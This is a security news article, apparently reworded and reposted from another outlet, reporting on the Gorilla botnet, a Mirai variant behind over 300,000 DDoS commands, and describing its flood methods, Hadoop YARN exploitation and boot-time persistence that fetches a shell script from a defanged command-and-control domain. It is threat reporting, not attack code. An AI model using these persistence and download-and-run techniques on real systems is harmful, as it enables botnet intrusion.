New Gorilla Botnet Deploys Over 300,000 DDoS Attacks Worldwide

AndyC 8 October 2024

October 07, 2024Ravie LakshmananInternet of Things Security / Botnet

Reportedly, cybersecurity scholars have unearthed a newly identified botnet virus known as Gorilla (or GorillaBot), which is a mutation of the exposed Mirai botnet source code.

New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries

October 07, 2024Ravie LakshmananInternet of Things Security / Botnet

New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries

Reportedly, cybersecurity scholars have unearthed a newly identified botnet virus known as Gorilla (or GorillaBot), which is a mutation of the exposed Mirai botnet source code.

A definitive report by cybersecurity enterprise NSFOCUS outlined that this botnet “dispatched in excess of 300,000 assault directives, showing alarming density” from September 4 to September 27, 2024. An approximate of 20,000 assault directives were orchestrated daily to initiate distributed denial-of-service (DDoS) attacks.

Cybersecurity

As per the analysis, the botnet targeted beyond 100 countries, launching assaults on educational institutions, governmental portals, telecommunications, banking institutions, as well as the gaming and betting sectors. Notably, China, the United States, Canada, and Germany were prominently victimized.

The firm based in Beijing noted that Gorilla predominantly relies on UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood methodologies for executing DDoS operations. Furthermore, the botnet leverages the connectionless attributes of the UDP protocol to generate substantial traffic through arbitrary source IP spoofing.

In addition to supporting diverse CPU structures like ARM, MIPS, x86_64, and x86, this botnet possesses the capacity to connect to one of five preconfigured command-and-control (C2) servers to await DDoS directives.

Interestingly, the malicious software integrates functionalities to exploit a security loophole present in Apache Hadoop YARN RPC for executing remote code. It is important to note that this vulnerability has been exploited in real-world scenarios as early as 2021, as reported by Alibaba Cloud and Trend Micro.

Establishing persistence on the host involves creating a service file named custom.service within the “/etc/systemd/system/” directory and configuring it to initiate automatically on every system boot-up.

Cybersecurity

This service is responsible for downloading and executing a shell script (“lol.sh”) from a remote server (“pen.gorillafirewall[.]su”). Similar directives are also inserted into “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” files to download and activate the shell script upon system boot or user login.

“The botnet introduced multiple DDoS methodologies and utilized encryption algorithms commonly linked with the Keksec group to obscure vital details, along with deploying multiple strategies to maintain sustained control over IoT devices and cloud servers, showcasing a high level of evasion towards detection as an evolving botnet lineage,” stated NSFOCUS.

Enjoyed this write-up? Follow us on Twitter and LinkedIn for more exclusive reads.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts

Tags: , , , , , , , , ,

More Stories

The Case for Dynamic AI-SaaS Security as Copilots Scale

The Case for Dynamic AI-SaaS Security as Copilots Scale

AndyC 19 December 2025
Kimsuky Spreads DocSwap Android Malware via QR Phishing Posing as Delivery App

Kimsuky Spreads DocSwap Android Malware via QR Phishing Posing as Delivery App

AndyC 19 December 2025
CISA Flags Critical ASUS Live Update Flaw After Evidence of Active Exploitation

CISA Flags Critical ASUS Live Update Flaw After Evidence of Active Exploitation

AndyC 18 December 2025
Cisco Warns of Active Attacks Exploiting Unpatched 0-Day in AsyncOS Email Security Appliances

Cisco Warns of Active Attacks Exploiting Unpatched 0-Day in AsyncOS Email Security Appliances

AndyC 18 December 2025
SonicWall Fixes Actively Exploited CVE-2025-40602 in SMA 100 Appliances

SonicWall Fixes Actively Exploited CVE-2025-40602 in SMA 100 Appliances

AndyC 18 December 2025
Kimwolf Botnet Hijacks 1.8 Million Android TVs, Launches Large-Scale DDoS Attacks

Kimwolf Botnet Hijacks 1.8 Million Android TVs, Launches Large-Scale DDoS Attacks

AndyC 18 December 2025

You may have missed

Blog-5-300x200-1.jpg

How To Spot Health Insurance Scams This Open Enrollment Season

AndyC 19 December 2025
U.S. CISA adds Cisco, SonicWall, and ASUS flaws to its Known Exploited Vulnerabilities catalog

U.S. CISA adds Cisco, SonicWall, and ASUS flaws to its Known Exploited Vulnerabilities catalog

AndyC 19 December 2025
GhostPairing campaign abuses WhatsApp device linking to hijack accounts

GhostPairing campaign abuses WhatsApp device linking to hijack accounts

AndyC 19 December 2025
2025 Federal Retrospective: The Year of Resilient Innovation

2025 Federal Retrospective: The Year of Resilient Innovation

AndyC 19 December 2025
The Biggest Cyber Stories of the Year: What 2025 Taught Us

The Biggest Cyber Stories of the Year: What 2025 Taught Us

AndyC 19 December 2025

Subscribe To InfoSec Today News

You have successfully subscribed to the newsletter

There was an error while trying to send your request. Please try again.

World Wide Crypto will use the information you provide on this form to be in touch with you and to provide updates and marketing.